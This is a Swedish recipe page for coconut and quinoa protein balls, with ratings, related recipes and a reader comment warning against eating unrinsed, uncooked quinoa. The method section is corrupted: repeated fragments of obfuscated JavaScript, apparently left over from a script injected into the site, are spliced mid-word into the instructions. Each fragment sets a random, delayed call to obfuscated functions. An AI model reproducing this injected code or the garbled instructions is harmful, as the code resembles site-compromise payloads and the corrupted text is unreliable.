Proteinbollar med Quinoa

2013-06-01
imageimageimage
  • Yield : 10
  • Servings : 10
  • Prep Time : 5m
  • Cook Time : 35m
  • Ready In : 40m

Ingredienser

• 2 dl Riven Kokos
• 1/2 dl Fiberhavregryn
• 1,5 skopa Chokladproteinpulver
(Recovery Fitnessguru)
• 2 msk Kokosolja
• Salt & Kanel

Genomförandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e

Steg 1

Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a alla torrvaror i en skål
Tillsätt Kokosoljan
Lite salt & kanel

Steg 2

Forma till bollar & rulla dem i Quinoa

Låt stå i kylen i ca 30 min
innan servering

Medlemsbetyg

(5 / 5)

5 5 4
Betygsätt recept

4 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0985

    Lowcarb Carbonara

  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0920

    Svartvitlöks rostad kyckling

  • _SAM0671

    Sremska korv med rostad gulbeta, potatis, sparris, spenat, svartvitlök med fetaostkräm

Recipe Comments

  1. posted by Katrine on 21/06/2013

    Hej… Måste bara påpeka, att osköljd qinoua inte är bra att äta (innehåller en syra som ska sköljas bort), och okokt qinoua sväller i magen…
    Då jag gör qinouabollar har jag kokt qinoua i bollarna istället för havregryn, då blir de dessutom glutenfria sen rullar jag dem i kokos…
    Ja det var bara något jag kom på…

      Reply
    • posted by Henrik Grunden on 24/06/2013

      Tack Katrine, vi uppskattar din synpunkt! Vi ska se till att ändra receptet!

        Reply

Post A Comment

Current ye@r *